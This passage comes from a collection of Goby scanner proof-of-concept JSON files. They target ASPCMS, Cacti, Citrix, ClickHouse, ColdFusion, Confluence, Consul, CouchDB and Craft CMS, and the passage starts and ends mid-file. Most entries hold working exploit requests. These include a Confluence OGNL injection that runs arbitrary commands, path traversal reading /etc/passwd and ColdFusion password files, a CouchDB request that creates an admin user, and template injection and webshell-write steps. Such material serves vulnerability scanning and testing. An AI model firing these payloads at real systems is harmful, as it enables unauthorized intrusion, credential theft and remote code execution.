| } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "POST", 117 | "uri": "/graphql", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "{\"query\":\"{{{cmd}}}\",\"variables\":{\"duration\":{\"start\":\"2021-12-22 1259\",\"end\":\"2021-12-22 1314\",\"step\":\"MINUTE\"}}}", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2022-01-05 13:47:56", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /Aspcms_Backend_Leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Aspcms Backend Leak", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"ASPCMS\"", 8 | "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", 9 | "Product": "ASPCMS", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

leak backend url

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/plug/oem/AspCms_OEMFun.asp", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "alert(", 49 | "bz": "" 50 | } 51 | ] 52 | }, 53 | "SetVariable": [ 54 | "output|lastbody|regex|top.location.href='(.*?)'" 55 | ] 56 | }, 57 | { 58 | "Request": { 59 | "method": "GET", 60 | "uri": "{{{output}}}", 61 | "follow_redirect": true, 62 | "header": null, 63 | "data_type": "text", 64 | "data": "", 65 | "set_variable": [] 66 | }, 67 | "ResponseTest": { 68 | "type": "group", 69 | "operation": "AND", 70 | "checks": [ 71 | { 72 | "type": "item", 73 | "variable": "$code", 74 | "operation": "==", 75 | "value": "200", 76 | "bz": "" 77 | }, 78 | { 79 | "type": "item", 80 | "variable": "$body", 81 | "operation": "contains", 82 | "value": "username", 83 | "bz": "" 84 | } 85 | ] 86 | }, 87 | "SetVariable": [ 88 | "output|lastbody||" 89 | ] 90 | } 91 | ], 92 | "ExploitSteps": [ 93 | "AND", 94 | { 95 | "Request": { 96 | "method": "GET", 97 | "uri": "/plug/oem/AspCms_OEMFun.asp", 98 | "follow_redirect": false, 99 | "header": null, 100 | "data_type": "text", 101 | "data": "", 102 | "set_variable": [] 103 | }, 104 | "ResponseTest": { 105 | "type": "group", 106 | "operation": "AND", 107 | "checks": [ 108 | { 109 | "type": "item", 110 | "variable": "$code", 111 | "operation": "==", 112 | "value": "200", 113 | "bz": "" 114 | }, 115 | { 116 | "type": "item", 117 | "variable": "$body", 118 | "operation": "contains", 119 | "value": "alert(", 120 | "bz": "" 121 | } 122 | ] 123 | }, 124 | "SetVariable": [ 125 | "output|lastbody|regex|top.location.href='(.*?)'" 126 | ] 127 | } 128 | ], 129 | "PostTime": "2021-11-02 20:50:45", 130 | "GobyVersion": "1.8.302" 131 | } -------------------------------------------------------------------------------- /Cacti_Weathermap_File_Write.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Cacti Weathermap File Write", 3 | "Level": "3", 4 | "Tags": [ 5 | "getshell" 6 | ], 7 | "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", 8 | "Description": "allows remote attackers to upload and execute arbitrary files", 9 | "Product": "cacti-监控系统", 10 | "Homepage": "https://www.cacti.net/", 11 | "Author": "aetkrad", 12 | "Impact": "

Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/plugins/weathermap/editor.php?plug=0&mapname={{{str1}}}.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [ 32 | "str1|rand|str|7" 33 | ] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "output|lastbody|regex|" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "GET", 55 | "uri": "/plugins/weathermap/configs/test.php", 56 | "follow_redirect": false, 57 | "header": null, 58 | "data_type": "text", 59 | "data": "", 60 | "set_variable": [] 61 | }, 62 | "ResponseTest": { 63 | "type": "group", 64 | "operation": "AND", 65 | "checks": [ 66 | { 67 | "type": "item", 68 | "variable": "$code", 69 | "operation": "==", 70 | "value": "200", 71 | "bz": "" 72 | }, 73 | { 74 | "type": "item", 75 | "variable": "$body", 76 | "operation": "contains", 77 | "value": "46ea1712d4b13b55b3f680cc5b8b54e8", 78 | "bz": "" 79 | } 80 | ] 81 | }, 82 | "SetVariable": [ 83 | "output|lastbody|regex|" 84 | ] 85 | } 86 | ], 87 | "ExploitSteps": [ 88 | "AND", 89 | { 90 | "Request": { 91 | "method": "GET", 92 | "uri": "/test.php", 93 | "follow_redirect": true, 94 | "header": null, 95 | "data_type": "text", 96 | "data": "", 97 | "set_variable": [] 98 | }, 99 | "ResponseTest": { 100 | "type": "group", 101 | "operation": "AND", 102 | "checks": [ 103 | { 104 | "type": "item", 105 | "variable": "$code", 106 | "operation": "==", 107 | "value": "200", 108 | "bz": "" 109 | }, 110 | { 111 | "type": "item", 112 | "variable": "$body", 113 | "operation": "contains", 114 | "value": "test", 115 | "bz": "" 116 | } 117 | ] 118 | }, 119 | "SetVariable": [ 120 | "output|lastbody|regex|" 121 | ] 122 | } 123 | ], 124 | "PostTime": "2021-11-05 13:30:24", 125 | "GobyVersion": "1.8.302" 126 | } -------------------------------------------------------------------------------- /Citrix_Unauthorized_CVE_2020_8193.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Citrix Unauthorized CVE-2020-8193", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "(app=\"citrix-公司产品\" | title=\"Citrix Login\" | body=\"Citrix ADC\")", 8 | "Description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints", 9 | "Product": "citrix", 10 | "Homepage": "https://www.citrix.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1", 27 | "follow_redirect": false, 28 | "header": { 29 | "Content-Type": "application/xml", 30 | "X-NITRO-PASS": "{{{str1}}}", 31 | "X-NITRO-USER": "{{{str2}}}" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [ 36 | "str2|rand|str|8", 37 | "str1|rand|str|8" 38 | ] 39 | }, 40 | "ResponseTest": { 41 | "type": "group", 42 | "operation": "AND", 43 | "checks": [ 44 | { 45 | "type": "item", 46 | "variable": "$code", 47 | "operation": "==", 48 | "value": "406", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$head", 54 | "operation": "contains", 55 | "value": "SESSID=", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "ExploitSteps": [ 66 | "AND", 67 | { 68 | "Request": { 69 | "method": "GET", 70 | "uri": "/test.php", 71 | "follow_redirect": true, 72 | "header": null, 73 | "data_type": "text", 74 | "data": "", 75 | "set_variable": [] 76 | }, 77 | "ResponseTest": { 78 | "type": "group", 79 | "operation": "AND", 80 | "checks": [ 81 | { 82 | "type": "item", 83 | "variable": "$code", 84 | "operation": "==", 85 | "value": "200", 86 | "bz": "" 87 | }, 88 | { 89 | "type": "item", 90 | "variable": "$body", 91 | "operation": "contains", 92 | "value": "test", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody|regex|" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-06 14:18:50", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /ClickHouse_SQLI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ClickHouse SQLI", 3 | "Level": "3", 4 | "Tags": [ 5 | "sqli" 6 | ], 7 | "GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")", 8 | "Description": "ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据.", 9 | "Product": "ClickHouse", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/ping", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "X-Clickhouse-Summary", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | }, 59 | { 60 | "Request": { 61 | "method": "GET", 62 | "uri": "/?query=SHOW%20DATABASES", 63 | "follow_redirect": false, 64 | "header": null, 65 | "data_type": "text", 66 | "data": "", 67 | "set_variable": [] 68 | }, 69 | "ResponseTest": { 70 | "type": "group", 71 | "operation": "AND", 72 | "checks": [ 73 | { 74 | "type": "item", 75 | "variable": "$code", 76 | "operation": "==", 77 | "value": "200", 78 | "bz": "" 79 | }, 80 | { 81 | "type": "item", 82 | "variable": "$body", 83 | "operation": "contains", 84 | "value": "default", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "system", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-12-04 18:32:14", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Coldfusion_LFI_CVE_2010_2861.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Coldfusion LFI CVE-2010-2861", 3 | "Level": "2", 4 | "Tags": [ 5 | "lfi" 6 | ], 7 | "GobyQuery": "app=\"Adobe-ColdFusion\"", 8 | "Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.", 9 | "Product": "Adobe ColdFusion", 10 | "Homepage": "https://www.adobe.com/products/coldfusion-family.html", 11 | "Author": "aetkrad", 12 | "Impact": "

read arbitrary files

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "Name": "Filepath", 19 | "Type": "select", 20 | "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en" 21 | } 22 | ], 23 | "ExpTips": { 24 | "Type": "", 25 | "Content": "" 26 | }, 27 | "ScanSteps": [ 28 | "AND", 29 | { 30 | "Request": { 31 | "method": "GET", 32 | "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", 33 | "follow_redirect": true, 34 | "header": null, 35 | "data_type": "text", 36 | "data": "", 37 | "set_variable": [] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "rdspassword=", 55 | "bz": "" 56 | }, 57 | { 58 | "type": "item", 59 | "variable": "$body", 60 | "operation": "contains", 61 | "value": "encrypted=", 62 | "bz": "" 63 | } 64 | ] 65 | }, 66 | "SetVariable": [ 67 | "output|lastbody|regex|" 68 | ] 69 | } 70 | ], 71 | "ExploitSteps": [ 72 | "AND", 73 | { 74 | "Request": { 75 | "method": "GET", 76 | "uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}", 77 | "follow_redirect": true, 78 | "header": null, 79 | "data_type": "text", 80 | "data": "", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody||" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-08 15:51:21", 102 | "GobyVersion": "1.8.302" 103 | } -------------------------------------------------------------------------------- /Confluence_RCE_CVE_2021_26084.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Confluence RCE(CVE-2021-26084)", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "product=\"Confluence\"", 8 | "Description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", 9 | "Product": "Atlassian Confluence", 10 | "Homepage": "https://www.atlassian.com/zh/software/confluence", 11 | "Author": "aetkrad", 12 | "Impact": "

allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084" 16 | ], 17 | "HasExp":true, 18 | "ExpParams":[ 19 | { 20 | "name":"cmd", 21 | "type":"input", 22 | "value":"whoami", 23 | "show":"" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "POST", 31 | "uri": "/pages/doenterpagevariables.action", 32 | "follow_redirect": false, 33 | "header": { 34 | "Content-Type": "application/x-www-form-urlencoded" 35 | }, 36 | "data_type": "text", 37 | "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027echo workwork\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027echo workwork\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027" 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "workwork", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [] 60 | } 61 | ], 62 | "ExploitSteps":[ 63 | "AND", 64 | { 65 | "Request": { 66 | "method": "POST", 67 | "uri": "/pages/doenterpagevariables.action", 68 | "follow_redirect": false, 69 | "header": { 70 | "Content-Type": "application/x-www-form-urlencoded" 71 | }, 72 | "data_type": "text", 73 | "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027{{{cmd}}}\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027{{{cmd}}}\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027" 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|value=\"{([\\s\\S]*)=null}\"" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-10-27 13:33:02", 81 | "GobyVersion": "1.8.294" 82 | } -------------------------------------------------------------------------------- /Consul_Rexec_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Consul Rexec RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "protocol=\"consul(http)\"", 8 | "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", 9 | "Product": "Consul", 10 | "Homepage": "https://www.consul.io/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.exploit-db.com/exploits/46073" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v1/agent/self", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "\"DisableRemoteExec\":false", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "PostTime": "2021-11-08 21:46:25", 61 | "GobyVersion": "1.8.302" 62 | } -------------------------------------------------------------------------------- /Couch_CMS_Infoleak_CVE_2018_7662.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couch CMS Infoleak CVE-2018-7662", 3 | "Level": "3", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "(title=\"CouchCMS\" | body=\"Powered by CouchCMS\")", 8 | "Description": "Couch through 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php", 9 | "Product": "Couch cms", 10 | "Homepage": "https://www.couchcms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/includes/mysql2i/mysql2i.func.php", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "mysql2i.func.php on line 10", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "Fatal error: Cannot redeclare mysql_affected_rows() in", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody||" 62 | ] 63 | }, 64 | { 65 | "Request": { 66 | "method": "GET", 67 | "uri": "/addons/phpmailer/phpmailer.php", 68 | "follow_redirect": false, 69 | "header": null, 70 | "data_type": "text", 71 | "data": "", 72 | "set_variable": [] 73 | }, 74 | "ResponseTest": { 75 | "type": "group", 76 | "operation": "AND", 77 | "checks": [ 78 | { 79 | "type": "item", 80 | "variable": "$code", 81 | "operation": "==", 82 | "value": "200", 83 | "bz": "" 84 | }, 85 | { 86 | "type": "item", 87 | "variable": "$body", 88 | "operation": "contains", 89 | "value": "phpmailer.php on line 10", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "Fatal error: Call to a menber function add_event_listener() on a non-object in", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": [ 102 | "output|lastbody||" 103 | ] 104 | } 105 | ], 106 | "PostTime": "2021-11-09 19:56:42", 107 | "GobyVersion": "1.8.302" 108 | } -------------------------------------------------------------------------------- /Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Add User Not Authorized CVE-2017-12635", 3 | "Level": "3", 4 | "Tags": [ 5 | "Ultra vires" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "Name": "创建用户", 19 | "Type": "select", 20 | "Value": "CanIHelpYou:NoThank" 21 | } 22 | ], 23 | "ExpTips": { 24 | "Type": "", 25 | "Content": "" 26 | }, 27 | "ScanSteps": [ 28 | "AND", 29 | { 30 | "Request": { 31 | "method": "PUT", 32 | "uri": "/_users/org.couchdb.user:{{{str1}}}", 33 | "follow_redirect": false, 34 | "header": { 35 | "Content-Type": "application/json" 36 | }, 37 | "data_type": "text", 38 | "data": " {\n \"type\": \"user\",\n \"name\": \"{{{str1}}}\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"{{{str2}}}\"\n }", 39 | "set_variable": [ 40 | "str1|rand|str|32", 41 | "str2|rand|str|64" 42 | ] 43 | }, 44 | "ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "201", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "org.couchdb.user:{{{r1}}}", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "PUT", 74 | "uri": "/_users/org.couchdb.user:CanIHelpYou", 75 | "follow_redirect": false, 76 | "header": { 77 | "Content-Type": "application/json" 78 | }, 79 | "data_type": "text", 80 | "data": " {\n \"type\": \"user\",\n \"name\": \"CanIHelpYou\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"NoThank\"\n }", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "201", 92 | "bz": "" 93 | }, 94 | { 95 | "type": "item", 96 | "variable": "$body", 97 | "operation": "contains", 98 | "value": "org.couchdb.user:CanIHelpYou", 99 | "bz": "" 100 | } 101 | ] 102 | }, 103 | "SetVariable": [ 104 | "output|lastbody||" 105 | ] 106 | } 107 | ], 108 | "PostTime": "2021-11-10 19:52:21", 109 | "GobyVersion": "1.8.302" 110 | } -------------------------------------------------------------------------------- /Couchdb_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Unauth", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

Allows remote attackers to execute arbitrary code

", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.seebug.org/vuldb/ssvid-91597" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/_config", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "httpd_design_handlers", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "external_manager", 58 | "bz": "" 59 | }, 60 | { 61 | "type": "item", 62 | "variable": "$body", 63 | "operation": "contains", 64 | "value": "replicator_manager", 65 | "bz": "" 66 | } 67 | ] 68 | }, 69 | "SetVariable": [ 70 | "output|lastbody|regex|" 71 | ] 72 | } 73 | ], 74 | "PostTime": "2021-11-10 20:27:45", 75 | "GobyVersion": "1.8.302" 76 | } -------------------------------------------------------------------------------- /CraftCMS_Seomatic_RCE_CVE_2020_9597.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CraftCMS Seomatic RCE CVE-2020-9597", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(title==\"Welcome to Craft CMS\" | body=\"href=\\\"http://craftcms.com/\\\"\" | body=\"SEOmatic\" | header=\"Craft CMS\" | header=\"Craft CMS, SEOmatic\")", 8 | "Description": "The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.", 9 | "Product": "craftcms", 10 | "Homepage": "https://craftcms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "craft.app.view.evaluateDynamicContent('phpinfo();')" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/actions/seomatic/meta-container/meta-link-container/?uri={{5*'5'}}", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [ 40 | "r1|rand|int|2", 41 | "r2|rand|int|2" 42 | ] 43 | }, 44 | 